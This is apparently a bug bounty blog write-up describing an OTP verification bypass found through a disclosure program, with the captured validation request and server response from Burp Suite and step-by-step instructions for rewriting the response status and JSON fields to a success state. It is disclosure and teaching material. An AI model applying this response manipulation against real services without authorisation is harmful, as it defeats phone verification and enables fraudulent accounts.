OTP Bypass via Response Manipulation

Hey hackers ……

whoami ? G Bharath Kalyan , Security Researcher , Bug Bounty Hunter from Chennai , India .

This is my second bug bounty writeup . here it is my first writeup read this .

Today I am gonna talk about one of my finding ..which is OTP Bypass via Response Manipulation ..

DESCRIPTION :

One of the ways to bypass OTP verification is by handling the response of a request. What you need to do is enter your credentials and put in a fake OTP code and capture the request. Then intercept the response and change the status code to 200, or some boolean from false to true.

Let’s dig in!

I Found this bug in VDP …

First of all let’s assume that Website is www.target.com .

1) Signup an account in www.target.com

2) Enter the email and password and click on signup .

3) The Verification mail sent to given mail address . After verify the account .

4) You will able to see the name and country field and Enter the name and country , click on next .

5) you will able to see the phone number field .

6) Enter the phone number and click on the send otp .

7) Enter the wrong OTP and click on verify and capture the request in burp suite .

8) The request be like ..

POST /kyc/v1/provider/OTP/validate HTTP/2
Host: api.target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target.com/
Content-Type: application/json
Authorization: Bearer
Content-Length: 51
Origin: https://target.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

{“otpCode”:”000000",”mobileNumber”:”your number”}

9) The Response be like

HTTP/2 400 Bad Request
Date: Fri, 03 Feb 2023 06:49:27 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
X-Amzn-Requestid: d7945153–47ab-4a62–8516–4aad0858ead3
X-Dns-Prefetch-Control: off
Referrer-Policy: no-referrer
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
Access-Control-Allow-Origin: *
Expect-Ct: max-age=0
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Amzn-Remapped-Content-Length: 65
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src ‘self’;base-uri ‘self’;block-all-mixed-content;font-src ‘self’ https: data:;frame-ancestors ‘self’;img-src ‘self’ data:;object-src ‘none’;script-src ‘self’;script-src-attr ‘none’;style-src ‘self’ https: ‘unsafe-inline’;upgrade-insecure-requests
X-Amzn-Remapped-Connection: keep-alive
X-Download-Options: noopen
X-Amz-Apigw-Id: fwAymFoFBcwFsfQ=
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Etag: W/”41-+wRLn6C1eL5LT718HJ9jGNCrZvA”
X-Amzn-Remapped-Date: Fri, 03 Feb 2023 06:49:27 GMT

{“to”:”your number”,”status”:”pending”,”message”:”Invalid Otp”}

10) Change the above the response

400 bad request >>> 200 ok

“status”:”pending” >>> “status”:”success”

“message”:invalid otp” >>> “message”:valid otp”

11) successfully bypass the otp and created the account .

there is no indication for correct otp in the application . the application directly login into the account so i didn’t attach the photo .

…………..

Researchers always try to bruteforce the OTP field but they forget to analyze the response sent to the browser. Play with the response manipulation sometimes server fail to fetch the response …

Disclaimer

The Blog Content has been made available for informational and educational purposes only.

I hereby disclaims any and all liability to any party for any direct, indirect, implied, punitive, special, incidental or other consequential damages arising directly or indirectly from any use of the Blog Content is solely responsible by the readers.

connect with me LinkedIn , Twitter

Thanks for Reading :)

Happy hacking :)😊❤️